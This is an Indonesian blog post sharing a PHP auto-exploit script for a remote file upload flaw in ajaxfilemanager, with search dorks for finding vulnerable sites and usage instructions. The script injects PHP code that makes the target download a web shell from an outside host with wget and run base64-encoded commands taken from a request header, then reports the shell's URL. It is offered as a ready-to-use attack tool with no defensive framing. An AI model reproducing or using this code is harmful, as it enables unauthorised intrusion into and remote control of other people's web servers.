Balik lagi nih, marhaban ya ramadhan bagi yg menjalankan, masih exploit yang pernah gw share ajaxfilemanager remote file upload, tapi kali ini make auto uploader buatan gw :v biar ga ribet..
nih langsung aja
commnadnya
# php ajaxfilemanager.php site.com /path-ajaxfilemanager/
nanti kalo keupload juga mucul link shellnya
nih scriptnya
<?php
/*
dork inurl:/e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager
inurl:/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/
use ur brain :p
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die( "\n[-] No response from {$host}:80\n");
fwrite($sock, $packet);
return stream_get_contents($sock);
}
print "#[+] Author: unnamed48\n";
print "#[+] Script coded BY:unnamed48\n";
print "#[+] Title: Remote File Upload Auto Exploit\n";
print "#[+] Facebook: facebook.com/unnamed48\n";
print "#[+} Website: http://unnamed48.id or gblog48.blogspot.com\n";
print "'##::::'##:'##::: ##:'##::: ##::::'###::::'##::::'##:'########:'########::'##:::::::::'#######::
##:::: ##: ###:: ##: ###:: ##:::'## ##::: ###::'###: ##.....:: ##.... ##: ##:::'##::'##.... ##:
##:::: ##: ####: ##: ####: ##::'##:. ##:: ####'####: ##::::::: ##:::: ##: ##::: ##:: ##:::: ##:
##:::: ##: ## ## ##: ## ## ##:'##:::. ##: ## ### ##: ######::: ##:::: ##: ##::: ##::: #######::
##:::: ##: ##. ####: ##. ####: #########: ##. #: ##: ##...:::: ##:::: ##: #########:'##.... ##:
##:::: ##: ##:. ###: ##:. ###: ##.... ##: ##:.:: ##: ##::::::: ##:::: ##:...... ##:: ##:::: ##:
. #######:: ##::. ##: ##::. ##: ##:::: ##: ##:::: ##: ########: ########:::::::: ##::. #######::
:.......:::..::::..::..::::..::..:::::..::..:::::..::........::........:::::::::..::::.......:::\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <ajaxfilemanager_path>\n";
print "\nExample....: php $argv[0] domain.com /e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/\n";
die();
}
$host = $argv[1];
$path1 = $argv[2];
$exploit = "foo=<?php error_reporting(0);print(system('wget http://www.heron-photography.co.uk/shell.txt -O shani.php'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path1}/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($exploit)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$exploit}";
http_send($host, $packet);
$packet = "GET {$path1}/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
$in = "inc/shani.php";
$ha = "http://";
$target = $ha.$host.$path1.$in;
$cek = file_get_contents($target);
print "\n[+] thx to my team Res7ock Crew and my oshi shani jkt48 :*\n";
if(preg_match("/File upload by unnamed48/", $cek))
{
echo "\n\n[+] uploaded XD cek @ http://$host$path1/inc/shani.php\n";
}
else {
echo "\n\n[-] Exploit Failed :( maafkan aku shani\n";
}
?>
video tutorial here
Makasih buat res7ock crew dan bang agus dari idx..
makasih juga shani dan della oshi gw :v "jomblo wota :v"
1 Comments